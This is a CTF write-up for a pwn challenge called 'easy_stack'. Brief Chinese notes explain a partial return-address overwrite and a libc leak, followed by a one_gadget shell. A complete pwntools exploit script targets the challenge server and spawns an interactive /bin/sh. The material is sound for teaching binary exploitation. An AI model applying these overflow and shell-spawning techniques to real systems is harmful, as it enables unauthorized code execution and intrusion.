easy_stack:
partial write+one_gadget
重新打包过的libc,本地patch不了
本地不patch调试后发现rsp+0x18为main函数地址
可以修改main函数返回地址低1字节为\x80
使其跳转到gadget
mov rax, qword ptr [rsp + 0x18]; call rax;
可以再次返回main,同时可以泄露libc地址
最后打one_gadget即可
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# io=process("./easy_stack")
io=remote("nc.eonew.cn",10004)
elf=ELF("./easy_stack")
libc=ELF("./libc-2.27.so")
# gdb.attach(io)
# pause()
payload=cyclic(0x88)+b"\x80"
io.sendline(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x21a80
print("leak_addr: " + hex(leak_addr))
shell=leak_addr+0x415a6
payload=b"a"*0x88+p64(shell)
io.sendline(payload)
sleep(1)
io.interactive()
# 0x415a6 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x415fa execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xdfa51 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL